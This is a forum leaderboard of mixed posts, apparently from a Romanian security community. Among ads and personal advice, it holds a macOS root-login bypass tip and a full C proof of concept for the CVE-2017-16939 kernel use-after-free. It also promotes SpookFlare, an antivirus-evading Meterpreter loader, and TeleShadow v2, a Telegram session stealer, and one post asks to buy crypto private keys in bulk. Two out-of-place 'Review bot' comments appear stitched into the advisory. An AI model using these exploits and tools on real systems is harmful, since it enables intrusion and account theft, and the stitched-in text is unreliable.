Leaderboard

Popular Content

Showing content with the highest reputation on 11/28/17 in all areas

  1. Try logging with the user "root" without a password on the latest ver of MacOS (try two times) https://mobile.twitter.com/lemiorhan/status/935581020774117381 LE: Already news https://www.laptopmag.com/articles/root-macos-high-sierra
    6 points
  2. In case you want to make sure that the romantic side of your lives is in line with the social one, I recommend:
    3 points
  3. A 10/10 guy, he knows what he's doing. I recommend him!
    2 points
  4. Vulnerability Summary
     The following advisory describes a use-after-free vulnerability found in the Linux kernel that can lead to privilege escalation. The vulnerability is found in the Netlink socket subsystem – XFRM. Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user-space processes and an internal kernel API for kernel modules.
     Credit
     An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
     Vendor response
     The vulnerability has been addressed as part of 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”) patch: CVE-2017-16939
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr static int xfrm_dump_policy_done(struct netlink_callback *cb) { - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct net *net = sock_net(cb->skb->sk); xfrm_policy_walk_done(walk, net); return 0; } +static int xfrm_dump_policy_start(struct netlink_callback *cb) +{ + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; + + BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args)); + + xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); + return 0; +} + static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb) { struct net *net = sock_net(skb->sk); - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct xfrm_dump_info info; - BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) > - sizeof(cb->args) - sizeof(cb->args[0])); - info.in_skb = cb->skb; info.out_skb = skb; info.nlmsg_seq = cb->nlh->nlmsg_seq; info.nlmsg_flags = NLM_F_MULTI; - if (!cb->args[0]) { - cb->args[0] = 1; - xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); - } - (void) xfrm_policy_walk(net, walk, dump_one_policy, &info); return skb->len; @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = { static const struct xfrm_link { int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **); + int (*start)(struct netlink_callback *); int (*dump)(struct sk_buff *, struct netlink_callback *); int (*done)(struct netlink_callback *); const struct nla_policy *nla_pol; 
@@ -2487,6 +2490,7 @@ static const struct xfrm_link { [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy }, [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy }, [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy, + .start = xfrm_dump_policy_start, .dump = xfrm_dump_policy, .done = xfrm_dump_policy_done }, [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi }, 
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, { struct netlink_dump_control c = { + .start = link->start, .dump = link->dump, .done = link->done, };
     Vulnerability details
     An unprivileged user can change the Netlink socket subsystem – XFRM value sk->sk_rcvbuf (sk == struct sock object). The value can be changed into a specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read. The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects). skb->truesize is a variable which keeps track of how many bytes of memory are consumed; in order not to waste memory and to manage it, the kernel can handle the skb size at run time. For example, if we allocate a large socket buffer (skb) and we only received a 1-byte packet, the kernel will adjust this by calling skb_set_owner_r. By calling skb_set_owner_r, the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.
     When we create an XFRM netlink socket, xfrm_dump_policy is called; when we close the socket, xfrm_dump_policy_done is called. xfrm_dump_policy_done is called whenever cb_running for the netlink_sock object is true. The xfrm_dump_policy_done tries to clean up an xfrm walk entry which is managed by the netlink_callback object. When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.
     netlink_dump(): In above snippet we can see that the netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via setsockopt). When this condition fails, it jumps to the end of the function and quits with failure, and the value of cb_running is not changed to false. nlk->cb_running is true, thus xfrm_dump_policy_done() is being called.
     nlk->cb.done points to xfrm_dump_policy_done; it is worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.
     Proof of concept
     The following proof of concept is for Ubuntu 17.04.

         #define _GNU_SOURCE
         #include <string.h>
         #include <stdio.h>
         #include <stdlib.h>
         #include <asm/types.h>
         #include <sys/socket.h>
         #include <netinet/in.h>
         #include <arpa/inet.h>
         #include <linux/netlink.h>
         #include <linux/xfrm.h>
         #include <sched.h>
         #include <unistd.h>

         #define BUFSIZE 2048

         int fd;
         struct sockaddr_nl addr;

         struct msg_policy {
             struct nlmsghdr msg;
             char buf[BUFSIZE];
         };

         void create_nl_socket(void)
         {
             fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
             memset(&addr, 0, sizeof(struct sockaddr_nl));
             addr.nl_family = AF_NETLINK;
             addr.nl_pid = 0; /* packet goes into the kernel */
             addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
         }

         void do_setsockopt(void)
         {
             int var = 0x100;
             setsockopt(fd, 1, SO_RCVBUF, &var, sizeof(int));
         }

         struct msg_policy *init_policy_dump(int size)
         {
             struct msg_policy *r;

             r = malloc(sizeof(struct msg_policy));
             if (r == NULL) {
                 perror("malloc");
                 exit(-1);
             }
             memset(r, 0, sizeof(struct msg_policy));
             r->msg.nlmsg_len = 0x10;
             r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
             r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
             r->msg.nlmsg_seq = 0x1;
             r->msg.nlmsg_pid = 2;
             return r;
         }

         int send_msg(int fd, struct nlmsghdr *msg)
         {
             int err;

             err = sendto(fd, (void *)msg, msg->nlmsg_len, 0,
                          (struct sockaddr *)&addr, sizeof(struct sockaddr_nl));
             if (err < 0) {
                 perror("sendto");
                 return -1;
             }
             return 0;
         }

         void create_ns(void)
         {
             if (unshare(CLONE_NEWUSER) != 0) {
                 perror("unshare(CLONE_NEWUSER)");
                 exit(1);
             }
             if (unshare(CLONE_NEWNET) != 0) {
                 perror("unshare(CLONE_NEWNET)");
                 exit(2);
             }
         }

         int main(int argc, char **argv)
         {
             struct msg_policy *p;

             create_ns();
             create_nl_socket();
             p = init_policy_dump(100);
             do_setsockopt();
             send_msg(fd, &p->msg);
             p = init_policy_dump(1000);
             send_msg(fd, &p->msg);
             return 0;
         }

     Source: https://blogs.securiteam.com/index.php/archives/3535
    2 points
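     Review bot: in the first hunk of the patch in item 4, xfrm_dump_policy_done() now casts cb->args directly and calls xfrm_policy_walk_done() with nothing left to tell whether the walk was ever initialised, since the cb->args[0] guard is removed from xfrm_dump_policy(). That is only safe if .done can never run unless .start has run first, so a short comment on xfrm_dump_policy_start() stating that invariant would help. The cast `(struct xfrm_policy_walk *)cb->args` is now repeated in three functions and would read better behind one small helper.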
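     Review bot: in the xfrm_user_rcv_msg() hunk of the patch in item 4, `.start = link->start` is copied for every message type, while the table hunk sets `.start` only for XFRM_MSG_GETPOLICY, so any other entry that has a .dump callback passes a NULL start. Please confirm the netlink dump path treats a NULL .start as optional, and say in the commit message whether other dump handlers that initialise their walk lazily inside .dump need the same move into a start callback.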
  5. She took you for a fool, and fooled you even more. Give her a kick in the ass and get a divorce; you will surely find 100 other "kitties" like her to drive around in your ML.
    2 points
  6. also put the report https://www.virustotal.com/#/file/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa/detection https://www.hybrid-analysis.com/sample/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa?environmentId=100 on the site
    2 points
  7. https://www.google.ro/search?client=ms-android-google&q=intreruperea+caldurilor+la+scroafe&sa=X&ved=0ahUKEwjoxcKakN_XAhVRKewKHfnoCfEQ1QIIaygG&biw=412&bih=604&dpr=2.63
    2 points
  8. Web Development
     Web languages: PHP, Javascript
     Design: Bootstrap
     Template engine: Smarty
     Editing/Fixing/Optimization: Wordpress
     Framework for scrapers: Simple HTML Dom
     Information
     - I accept both long-term and short-term projects.
     - For any project, all details will be settled with the client at the start; new features cannot be added during the project (only small changes).
     - Support is entirely FREE. By support I mean: installation, bug fixing, MySQL fixing, etc.
     - Prices will be set according to the time the project requires and its complexity.
     - I also accept jobs where I receive a monthly salary.
     - I also accept jobs where I am paid by the hour.
     Portfolio:
     - I offer live previews of projects in private or via TeamViewer (I am not allowed to share the companies' links, but I can show pictures.)
     Payment
     - BitCoin/Ethereum
     - PayPal
     - Bank transfer
     - Paysafe
     Contact
     - ICQ: CURRENTLY UNAVAILABLE
     - Telegram: @adicode
     - Skype: adicode32@outlook.com
     - Jabber: adicode@404.city
     **Please do not leave messages like "I added you", "how much would it cost?", "can you do this?" in the topic. I await any question by PM or on one of the networks above. Thank you.
    1 point
  9. SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader generator for Meterpreter Reverse HTTP and HTTPS stages. SpookFlare has custom encrypter with string obfuscation and run-time code compilation features so you can bypass the countermeasures of the target systems like a boss until they “learn” the technique and behavior of SpookFlare payloads.
     - Obfuscation
     - Runtime Code Compiling
     - Source Code Encryption
     - Patched Meterpreter Stage Support

         Version : 1.0
         Author  : Halil Dalabasmaz
         WWW     : artofpwn.com
         Twitter : @hlldz
         Github  : @hlldz
         Licence : Apache License 2.0
         Note    : Stay in shadows!
         -------------------------------------------------------
         [*] You can use "help" command for access help section.
         spookflare > help
         list     : List payloads
         generate : Generate payloads
         exit     : Exit from program
         [!] Important: Use x86 listener for x86 payloads and x64 listener for x64 payloads otherwise the process will crash!
         spookflare > list
         SpookFlare can generate following payloads.
         [*] Meterpreter Loader (.EXE) with Custom Encrypter and Custom Stub:
         - Meterpreter Reverse HTTP x86/x64
         - Meterpreter Reverse HTTPS x86/x64

     Technical Details: https://artofpwn.com/spookflare.html
     Download: SpookFlare-master.zip
     Source: https://github.com/hlldz/SpookFlare
    1 point
  10. Thank you. UPDATE: I now work with WordPress too and welcome projects based on this platform; I am not looking for long projects on WordPress, only on PHP.
    1 point
  11. Selling an HP Elitebook 2170p laptop, 11.6 inch. Processor i5 3427U / 1.8 GHz, turbo up to 2.3 GHz. RAM 8GB. SSD 120GB. The battery lasts 3 hours. Integrated graphics card. Shows signs of use. No hidden defects; I ask for and offer seriousness. Price 750 lei. Handover in person in Bucharest or delivery nationwide (I pay the courier)
    1 point
  12. ondevice ssh: just like ssh, but for devices without public IP. Run commands and copy files just like you’d normally do with ssh, rsync, scp or sftp, no matter where your devices are. Sign up now and get 5 devices + 5GB/month for free! Source: http://ondevice.io/
    1 point
  13. Since it's a free-for-all in the thread anyway, the initial offer stands. 10% commission.
    1 point
  14. net-Shield
     An Easy and Simple Anti-DDoS solution for VPS, Dedicated Servers and IoT devices based on iptables.
     Requirements
     - Linux System with python, iptables
     - Nginx (Will be installed automatically by install.sh)
     Quickstart
     Running as a standalone software (No install.sh required) via DryRun option (-dry) to only check connections against ip/netsets and do not touch iptables firewall.
         python nshield-main.py -dry
     For complete install:
         cd /home/ && git clone https://github.com/fnzv/net-Shield.git && bash net-Shield/install.sh
     WARNING: This script will replace all your iptables rules and installs Nginx so take that into account
     Proxy Domains
     To configure proxydomains you need to enable the option on /etc/nshield/nshield.con (nshield_proxy: 1) and be sure that the proxydomain list (/etc/nshield/proxydomain ) is following this format:
         mysite.com 123.123.123.123
         example.com 111.111.111.111
     Usage
     The above quickstart/installation script will install python if not present and download all the repo with the example config files; after that a bash script will be executed to set up some settings and a cron that will run every 30 minutes to check connections against common ipsets. You can find example config files under the examples folder.
     HTTPS
     Manual verification is executed with this command under the repository directory:
         python nshield-main.py -ssl
     The python script, after reading the config, will prompt you to insert an email address (for Let's Encrypt) and change your domain DNS to the nShield server for SSL DNS Challenge confirmation. Example:
         I Will generate SSL certs for sami.pw with Let's Encrypt DNS challenge
         Insert your email address? (Used for cert Expiration and Let's Encrypt TOS agreement
         samiii@protonmail.com
         Saving debug log to /var/log/letsencrypt/letsencrypt.log
         Renewing an existing certificate
         Performing the following challenges:
         dns-01 challenge for sami.pw
         -------------------------------------------------------------------------------
         Please deploy a DNS TXT record under the name
         _acme-challenge.sami.pw with the following value:
         wFyeYk4yl-BERO6pKnMUA5EqwawUri5XnlD2-xjOAUk
         Once this is deployed,
         -------------------------------------------------------------------------------
         Press Enter to Continue
         Waiting for verification...
         Cleaning up challenges
     Now your domain is verified and an SSL cert is issued to the Nginx configuration and you can change your A record to this server.
     How it works
     Basically this python script is set by default to run every 30 minutes and check the config file to execute these operations:
     - Get latest Bot, Spammers, Bad IP/Net reputation lists and blocks if those Bad guys are attacking your server (Thank you FireHol http://iplists.firehol.org/ )
     - Enables basic Anti-DDoS methods to deny unwanted/malicious traffic
     - Rate limits when under attack
     - Allows HTTP(S) Proxying to protect your site with an external proxy/server (You need to manually run SSL Verification first time)
     Demo: https://asciinema.org/a/elow8qggzb7q6durjpbxsmk6r
     Download: net-Shield-master.zip
     Tested on Ubuntu 16.04 and 14.04 LTS
     Source: https://github.com/fnzv/net-Shield
    1 point
  15. What trust can he still have when his wife cheats on him while holding his hand?...
    1 point
  16. Update TeleShadow v2
     Video : https://telegram.me/parsingteam/3311
     What features does it have?
     - Support SMTP Transport!
     - Support Telegram API Transport!
     - Support FakeMessage!
     - Support Custom Icon!
     - Bypass Two-step confirmation
     - Bypass Inherent identity and need 5-digit verification code
     - Support for the official telegram desktop only windows !
     Download: TeleShadow2-master.zip
     Credits and author: https://github.com/ParsingTeam/TeleShadow2#thanks-to
    1 point
  17. @deauxefeforsaken I don't know if you've realized it, but you're getting marriage advice from people whose father you could be, because that's how Romanians are, experts in everything. If you came for "tech" advice, in your place I would stick to that. And then 2 things, whatever you do next: 1. Don't end up in the hands of the so-called "justice" system in Rromania, because it is an incredible mess 2. Be able to sleep at night afterwards and live with yourself (have a clear conscience) Good luck!
    1 point
  18. Does anyone have the Knoxss tool? Reference: https://knoxss.me/
    1 point
  19. Perfect combination:
     1 One VPS ( centos 6.7 + < 7.00 )
     2 Centos Web Panel installed
         cd /usr/local/src
         wget http://centos-webpanel.com/cwp-latest
         sh cwp-latest
     3 By accessing ip:2030/index.php?module=letsencrypt you will find a menu:
         Letsencrypt Manager [INSTALLED] By Installing Letsencrypt you will be able to install free Letsencrypt SSL certificates. Letsencrypt certificates are autorenew'ed daily by the cronjob, Autorenew status [INSTALLED]
     Conclusion: In a few steps you can install a free SSL certificate manager and turn http into https ...
    1 point
  20. Buying used bitcoin, litecoin and doge addresses in bulk. No balance. With private key. The addresses must be from 2014 or before 2014. Bulk = 100 - 1000 - 10,000, etc. addresses. Payment in BTC
    -1 points